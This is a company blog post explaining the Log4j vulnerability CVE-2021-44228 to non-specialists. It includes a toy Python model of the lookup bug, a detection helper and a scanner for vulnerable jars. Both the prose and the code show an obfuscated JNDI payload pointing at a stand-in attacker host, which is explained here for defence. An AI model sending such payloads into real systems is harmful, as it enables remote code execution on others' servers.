Classkick and the Log4j Vulnerability (CVE-2021-44228)

Published in Classkick Blog, Dec 17, 2021


Hello!

Let’s get the thing you are most likely here for out of the way first:

Classkick does not use log4j, and is not vulnerable to CVE-2021-44228.

If that’s all you needed to know, there’s no need to read further. However, if you’re curious about what log4j is, and why it’s suddenly in the news, keep on reading!

What is log4j and Why is it Being Talked About so Much Lately?

Have you ever been out somewhere and seen someone like a security guard keeping a list of things that happened in a book? Stuff like “3:40am, Lights in hallway turned on” or “11:00pm, Third shift began.” They use that to keep track of what happened. Since no human can (or should!) work 24 hours a day, it’s useful to share information on what happened with other people. Sometimes it’s a big help to figure out what’s going on, or if something is wrong.

Programmers do that too!

When we’re writing code we’ll tell the computer to keep a log of what’s going on, just like how a security guard might. Most of the time we tell the computer to create a file with this information in it (called a “log file”). In that log will be things like “User April logged in” or “Unable to talk to the database.” That file is very helpful for figuring out what went wrong when we’re trying to fix something that’s broken.

Since computers do a lot of things at once, it’s very handy to include extra information in the log file for each entry. Things like the exact time that it occurred, and what part of the program was running at the time. That’s where libraries like log4j come in! Computers are good at doing boring things like looking up what time it is, so programmers tell the computer to do that part, which lets them focus on the fun things (like adding cool features to Classkick!).

A programmer can tell the computer to record something like “User April logged in,” and the computer will turn that into “[2012-12-15 09:37:29] [com.classkick.sayHello:23] User April logged in.” (Look close! From left to right it’s the time it happened, the class and line of code where the message was logged from, and the message itself! Very handy for figuring out what was going on.)

So What’s the Big Deal About log4j?

log4j is a logging library that a lot of programmers use. It does its job well, so it’s in use in a lot of places. The problem is that log4j also looks inside the text it is asked to log for special patterns written as ${...} and replaces them with something it looks up (the current date, an environment variable, and so on). Some clever people discovered that this lookup processing ran on text that came from users, not just on text the programmer wrote, and figured out how to use that to do bad things.

Let’s suppose I knew that the computer would log something like “Login failure for April,” and I knew that “April” came from the login screen on the website. I could then type “EvilApril” into the login screen and the computer would log “Login failure for EvilApril.” Normally that’s fine, and that’s what we want to happen, right? But what if I typed one of those special ${...} patterns into the login screen instead, say ${jndi:ldap://attacker.example/a}? A vulnerable log4j would notice the pattern as it was writing the line to the file, contact the server named in it, and could even run code that server sent back. That’s not what the programmer wanted, but the library is doing it, and that’s why log4j is suddenly in the news. The bug gave people a way to make someone else’s computer do a thing that the programmer didn’t intend for it to do!
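To make that mechanism concrete, here is a toy model of a lookup-expanding logger. This is an added example written for this post, not Log4j’s own source and not anything Classkick runs: the `date`, `env`, `lower` and `jndi` handlers, the `%m` message placeholder and the `attacker.example` hostname are all constructed to mirror the shape of the real bug. The “vulnerable” formatter expands `${...}` lookups after the user-supplied message has been spliced into the layout pattern; the “fixed” formatter expands only the pattern and inserts the message verbatim, which is the behaviour the patched Log4j releases adopted by no longer evaluating lookups inside message text. The `${${lower:J}ndi:...}` input shows why a plain search for the word “jndi” is not enough: the nested lookup assembles the word at log time.

```python
"""Toy model of the lookup mechanism behind CVE-2021-44228.
Added example; not Log4j's source. Shows why expanding ${...} lookups in
*message text* (not just in the developer's layout pattern) is the bug."""
import re

# Innermost ${...} first, so nested/obfuscated forms resolve from the inside out.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# Constructed stand-in for the real environment lookup.
FAKE_ENV = {"HOSTNAME": "app-1"}


def resolve(expr, calls):
    """Resolve one lookup expression such as 'env:HOSTNAME'. `calls` records
    every network destination the jndi handler would have contacted."""
    key, _, arg = expr.partition(":")
    if key == "date":
        return "2021-12-17 09:37:29"      # fixed timestamp for reproducibility
    if key == "env":
        return FAKE_ENV.get(arg, "")
    if key == "lower":
        return arg.lower()                # used by attackers to hide 'jndi'
    if key == "jndi":
        # Real Log4j would connect to the LDAP/RMI server in `arg` and could
        # load or deserialise a class it sends back. Here we only record it.
        calls.append(arg)
        return "<remote object>"
    return "${" + expr + "}"              # unknown lookup is left untouched


def expand(text, calls):
    """Repeatedly expand lookups until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = LOOKUP.sub(lambda m: resolve(m.group(1), calls), text)
    return text


def format_vulnerable(pattern, message):
    """The buggy shape: the user-supplied message is spliced into the pattern
    and then the whole string is expanded, so lookups in the message run."""
    calls = []
    return expand(pattern.replace("%m", message), calls), calls


def format_fixed(pattern, message):
    """The corrected shape: only the developer-owned pattern is expanded;
    the message is inserted verbatim afterwards and never interpreted."""
    calls = []
    return expand(pattern, calls).replace("%m", message), calls


def would_trigger_jndi(untrusted):
    """Detection helper: dry-run the same expansion over an untrusted string
    (a header, a username, a log line) and return the JNDI URLs it would
    reach, which catches obfuscated forms that a plain 'jndi:' grep misses."""
    calls = []
    expand(untrusted, calls)
    return calls


PATTERN = "[${date}] [${env:HOSTNAME}] Login failure for %m"
# Constructed attacker input: the ${lower:J} trick hides the word 'jndi'.
EVIL_USERNAME = "${${lower:J}ndi:ldap://attacker.example/a}"

if __name__ == "__main__":
    for name, fmt in (("vulnerable", format_vulnerable), ("fixed", format_fixed)):
        line, calls = fmt(PATTERN, EVIL_USERNAME)
        print(f"{name}: {line}")
        print(f"{name}: network calls = {calls}")
    print("detected:", would_trigger_jndi("User-Agent: " + EVIL_USERNAME))
```

Running it prints the vulnerable line with the username replaced by “<remote object>” and one recorded call to ldap://attacker.example/a, while the fixed line carries the attacker’s string as plain text and makes no call. The detection helper is safe to run over untrusted input only because this model’s `jndi` handler records instead of connecting; the real library’s expander is exactly what must never see that input.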

How Did We Make Sure Classkick is Safe From this Bug?

There are lots of logging libraries available to use, and we use one that’s not vulnerable to the bug in CVE-2021-44228. We did an audit on December 10th, 2021 just to make sure that log4j wasn’t in use in our systems, and we discovered it isn’t.
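For readers who want to run a check of their own, the quickest way to find out whether log4j-core is present on a server is to look for the jar itself, including jars bundled inside .war or .ear files. The script below is an added example, not Classkick’s audit tooling. The class path `org/apache/logging/log4j/core/lookup/JndiLookup.class` and the Maven `pom.properties` location are the real ones shipped in log4j-core; the version rule covers 2.x before 2.15.0 with the 2.3.1 and 2.12.2 backport releases excluded. The sample .war that `demo()` builds in a temporary directory is constructed so the script runs offline.

```python
"""Find Log4j 2 (log4j-core) archives under a directory and flag versions
affected by CVE-2021-44228. Added example; not Classkick's audit tooling."""
import io
import os
import re
import sys
import tempfile
import zipfile

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# The class that implements ${jndi:...} lookups in log4j-core 2.x.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata inside log4j-core jars; its version= line is the exact release.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Old-branch backport releases that already contain the fix.
FIRST_FIXED_PATCH = {(2, 3): 1, (2, 12): 2}


def affected_by_cve_2021_44228(version):
    """True for log4j-core 2.x before 2.15.0, except the 2.3.1 / 2.12.2
    backports. Pre-releases such as '2.0-beta9' parse as 2.0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    if not m:
        return False
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    if major != 2 or minor >= 15:
        return False
    return patch < FIRST_FIXED_PATCH.get((major, minor), 10 ** 9)


def inspect_archive(source, label):
    """Examine one archive (a path or a file-like object) and any archives
    nested inside it, e.g. WEB-INF/lib/*.jar in a .war. Returns a list of
    findings, one per log4j-core jar seen."""
    findings = []
    try:
        zf = zipfile.ZipFile(source)
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_LOOKUP_CLASS in names
        if version is not None or has_jndi:
            findings.append({
                "path": label,
                "version": version,
                "jndi_lookup": has_jndi,
                # A jar with the class deleted by hand is mitigated even if old.
                "affected": affected_by_cve_2021_44228(version) and has_jndi,
            })
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                nested = io.BytesIO(zf.read(name))
                findings.extend(inspect_archive(nested, f"{label}!{name}"))
    return findings


def scan_tree(root):
    """Walk `root` and inspect every archive found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, name)
                findings.extend(inspect_archive(path, path))
    return findings


def build_sample_tree(root):
    """Constructed test data: a .war bundling a fake log4j-core 2.14.1 jar
    plus an unrelated jar, so the scanner can be exercised offline."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:
        jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # fake class file
        jar.writestr(POM_PROPERTIES, "version=2.14.1\n")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
        war.writestr("WEB-INF/lib/other-lib.jar", b"not really a jar")
    with zipfile.ZipFile(os.path.join(root, "clean.jar"), "w") as jar:
        jar.writestr("com/example/Hello.class", b"\xca\xfe\xba\xbe")


def demo():
    """Scan a constructed sample tree; returns the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    results = demo() if len(sys.argv) == 1 else scan_tree(sys.argv[1])
    for f in results:
        status = "AFFECTED by CVE-2021-44228" if f["affected"] else "not affected"
        print(f"{f['path']}: log4j-core {f['version'] or 'unknown'}, "
              f"JndiLookup {'present' if f['jndi_lookup'] else 'absent'}: {status}")
    sys.exit(1 if any(f["affected"] for f in results) else 0)
```

Run it with a directory argument to scan a real deployment; with no argument it scans the constructed sample and reports the bundled 2.14.1 jar as affected. Two caveats a practitioner should keep in mind: shaded or relocated builds of log4j-core will not carry the standard class path or `pom.properties` and are missed here, so the authoritative check remains the dependency manifest of each application; and an absent `JndiLookup` class in an otherwise old jar only means someone applied the manual class-removal mitigation, not that the jar was upgraded.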

The security of your classroom is really important to us! We will keep on monitoring the latest developments in this issue and will respond to any new threats immediately if needed.

April White

Site Reliability Engineer


Classkick is a digital notebook app making effective teaching easier. Give more feedback in less time. Automate the busy work so you can do the important work.